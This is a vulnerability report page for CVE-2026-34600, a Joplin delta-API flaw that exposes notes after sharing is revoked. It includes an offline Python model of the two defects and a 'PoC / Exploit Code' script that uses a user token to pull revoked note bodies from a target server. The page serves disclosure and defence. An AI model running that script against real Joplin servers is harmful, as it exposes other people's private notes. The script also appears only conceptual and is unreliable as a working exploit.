Security Vulnerability Report
CVE-2026-34600 CVSS 5.7 MEDIUM

Published: 2026-05-19 23:16:57
Last Modified: 2026-05-20 16:16:25

Description

Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create -> delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3.
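The two defects the description names (per-page compression collapsing create -> delete to NOOP, and item content attached without a share check) are easier to reason about in a small model. The block below is an added example, not Joplin Server code: the change log, item store, share table and function names are all constructed, and the two fixes it toggles (keeping the delete instead of NOOP, and requiring an active share before attaching content) are assumed mitigations, not the project's actual patch.

```python
# Added example (not Joplin Server code): a small model of the two defects the
# advisory describes, with an assumed fix for each, so the failure mode can be
# reproduced offline. Names, data shapes and the change log are constructed.
from typing import Dict, List, Optional, Set, Tuple

CREATE, UPDATE, DELETE = "create", "update", "delete"
Change = Tuple[str, str]  # (item_id, change_type)


def compress_page(page: List[Change], keep_delete: bool) -> List[Change]:
    """Collapse one page of changes to at most one change per item.

    keep_delete=False reproduces the flaw: create -> delete on the same page
    collapses to NOOP, so the deletion vanishes. keep_delete=True is the
    assumed safe reduction: create -> delete becomes delete, which survives
    the page boundary even when an earlier create sits on another page.
    """
    result: Dict[str, Optional[str]] = {}
    for item_id, ctype in page:
        if result.get(item_id) is None:
            result[item_id] = ctype  # first change for this item (or after a NOOP)
        elif result[item_id] == CREATE and ctype == DELETE:
            result[item_id] = DELETE if keep_delete else None  # None == NOOP (the flaw)
        elif ctype == DELETE:
            result[item_id] = DELETE
        # create/update followed by update keeps the earlier type
    return [(i, c) for i, c in result.items() if c is not None]


def build_delta(pages, items, shares, user, keep_delete, check_share):
    """Compress each page separately (as the advisory says the server does),
    then attach the latest item content to non-delete events, which is the
    DELTA_INCLUDES_ITEMS behaviour."""
    out = []
    for page in pages:
        for item_id, ctype in compress_page(page, keep_delete):
            entry = {"item_id": item_id, "type": ctype}
            item = items[item_id]
            # Existing filter only withholds content of items deleted for all users.
            if ctype != DELETE and not item["deleted_for_all"]:
                # Assumed fix: also require that the item is still shared with user.
                if not check_share or (item_id, user) in shares:
                    entry["item"] = item["content"]
            out.append(entry)
    return out


SECRET = "Q3 financials (constructed secret note body)"
PUBLIC = "shopping list (constructed, still shared)"


def run_scenario(keep_delete: bool, check_share: bool):
    """Constructed change log seen by recipient 'bob': note n1 was shared
    (page 1), then re-shared and unshared (page 2), so a create -> delete
    pair lands on a later page than the first create. n2 stays shared."""
    pages = [
        [("n1", CREATE), ("n2", CREATE)],
        [("n2", UPDATE), ("n1", CREATE), ("n1", DELETE)],
    ]
    items = {
        "n1": {"content": SECRET, "deleted_for_all": False},
        "n2": {"content": PUBLIC, "deleted_for_all": False},
    }
    shares: Set[Tuple[str, str]] = {("n2", "bob")}  # the n1 share was revoked
    return build_delta(pages, items, shares, "bob", keep_delete, check_share)


def exposed_content(delta) -> List[str]:
    """Item bodies a client would receive from a delta response."""
    return [e["item"] for e in delta if "item" in e]


def events_for(delta, item_id: str) -> List[str]:
    return [e["type"] for e in delta if e["item_id"] == item_id]


if __name__ == "__main__":
    for keep_delete, check_share in [(False, False), (True, False), (False, True), (True, True)]:
        d = run_scenario(keep_delete, check_share)
        print(f"keep_delete={keep_delete} check_share={check_share}: "
              f"n1 events={events_for(d, 'n1')} secret leaked={SECRET in exposed_content(d)}")
```

Running the four combinations shows why both fixes matter: with neither, page 2 compresses to nothing and the delta carries a lone create for n1 with the revoked note's content attached. Keeping the delete restores the create -> delete sequence, but the page 1 create still ships the content, so the share check is what actually stops the exposure; the share check alone leaves a stale create event (without content) that only the corrected compression removes.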

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Joplin <= 3.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# Conceptual Proof of Concept for CVE-2026-34600
# This script demonstrates how an attacker might exploit the delta API logic error
# to retrieve note content that is no longer shared with them.

TARGET_URL = "https://target-joplin-instance.com"
API_ENDPOINT = f"{TARGET_URL}/api/delta"
SESSION_TOKEN = "<attacker_session_token>"  # Low-privileged user token

headers = {
    "Authorization": f"Bearer {SESSION_TOKEN}",
    "Content-Type": "application/json"
}

# Step 1: Request delta updates
# The vulnerability relies on the server including items in the delta response
# without verifying if the sharing permission was revoked.
payload = {
    "options": {
        "DELTA_INCLUDES_ITEMS": True  # Trigger the vulnerable logic path
    }
}

try:
    print(f"[*] Requesting delta from {API_ENDPOINT}...")
    response = requests.post(API_ENDPOINT, headers=headers, data=json.dumps(payload))

    if response.status_code == 200:
        data = response.json()
        # Step 2: Parse response for exposed notes
        # Check if items are present that should have been filtered out
        if "items" in data:
            print("[+] Delta response received. Analyzing items...")
            for item in data["items"]:
                # In a real exploit, we would look for specific Note IDs we know were revoked
                print(f"[!] Found Item ID: {item.get('id')}")
                print(f"    Title: {item.get('title')}")
                # Guard against a missing body so the loop does not crash on None
                print(f"    Body (Snippet): {(item.get('body') or '')[:50]}...")
                print("    [*] This data should not be accessible if sharing was revoked.")
        else:
            print("[-] No items found in delta response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {str(e)}")

References

https://github.com/laurent22/joplin/issues/14110
https://github.com/laurent22/joplin/pull/14289
https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34600", "sourceIdentifier": "[email protected]", "published": "2026-05-19T23:16:57.290", "lastModified": "2026-05-20T16:16:25.463", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create - delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-281"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/laurent22/joplin/issues/14110", "source": "[email protected]"}, {"url": "https://github.com/laurent22/joplin/pull/14289", "source": "[email protected]"}, {"url": "https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94", "source": "[email protected]"}, {"url": "https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}